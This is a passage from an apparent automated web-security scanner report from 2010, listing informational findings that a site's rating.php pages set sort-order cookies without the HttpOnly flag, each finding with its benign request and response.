User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=19&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:12:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:12:37 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:12:37 GMT; path=/
Location: /detail/19/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.28. http://www.resellerbase.com/detail/20/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:05:08 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:05:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/20/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=20&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:05:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:05:08 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:05:08 GMT; path=/
Location: /detail/20/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.29. http://www.resellerbase.com/detail/22/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:10:06 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:10:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/22/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=22&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:10:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:10:06 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:10:06 GMT; path=/
Location: /detail/22/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.30. http://www.resellerbase.com/detail/23/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:20:35 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:20:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/23/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=23&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:20:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:20:35 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:20:35 GMT; path=/
Location: /detail/23/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.31. http://www.resellerbase.com/detail/26/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/26/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:22:51 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:22:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/26/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/sitesinstantly-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=26&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:22:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:22:51 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:22:51 GMT; path=/
Location: /detail/26/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.32. http://www.resellerbase.com/detail/28/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:24:12 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:24:12 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/28/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/nicline-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=28&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:24:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:24:12 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:24:12 GMT; path=/
Location: /detail/28/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.33. http://www.resellerbase.com/detail/29/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:04:26 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:04:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/29/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=29&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:04:26 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:04:26 GMT; path=/
Location: /detail/29/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.34. http://www.resellerbase.com/detail/30/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:05:44 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:05:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/30/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=30&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:05:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:05:44 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:05:44 GMT; path=/
Location: /detail/30/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.35. http://www.resellerbase.com/detail/31/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:07:38 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:07:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/31/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=31&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:07:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:07:38 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:07:38 GMT; path=/
Location: /detail/31/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.36. http://www.resellerbase.com/detail/32/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:14 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/32/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=32&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:14 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:14 GMT; path=/
Location: /detail/32/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.37. http://www.resellerbase.com/detail/33/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:24 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/33/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/33/love-money-de-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=33&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:24 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:24 GMT; path=/
Location: /detail/33/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.38. http://www.resellerbase.com/detail/34/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/34/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:33 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/34/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/34/vod-cash-com-german.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=34&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:33 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:33 GMT; path=/
Location: /detail/34/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.39. http://www.resellerbase.com/detail/35/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:08:16 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:08:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/35/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=35&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:08:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:08:16 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:08:16 GMT; path=/
Location: /detail/35/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.40. http://www.resellerbase.com/detail/36/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:57 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/36/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=36&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:57 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:57 GMT; path=/
Location: /detail/36/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.41. http://www.resellerbase.com/detail/37/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:21:24 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:21:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/37/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=37&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:21:24 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:21:24 GMT; path=/
Location: /detail/37/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.42. http://www.resellerbase.com/detail/38/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:13:13 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:13:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/38/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=38&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:13:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:13:13 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:13:13 GMT; path=/
Location: /detail/38/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.43. http://www.resellerbase.com/detail/39/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:11:13 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:11:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/39/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=39&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:11:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:11:13 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:11:13 GMT; path=/
Location: /detail/39/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.44. http://www.resellerbase.com/detail/4/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:07:05 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:07:05 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/4/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=4&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:07:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:07:05 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:07:05 GMT; path=/
Location: /detail/4/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.45. http://www.resellerbase.com/detail/40/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:22:05 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:22:05 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/40/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=40&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:22:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:22:05 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:22:05 GMT; path=/
Location: /detail/40/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.46. http://www.resellerbase.com/detail/41/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:09:29 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:09:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/41/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=41&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:09:29 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:09:29 GMT; path=/
Location: /detail/41/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.47. http://www.resellerbase.com/detail/42/rating.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:10:40 GMT; path=/
COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:10:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/42/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=42&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:10:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:10:40 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:10:40 GMT; path=/
Location: /detail/42/rating.php
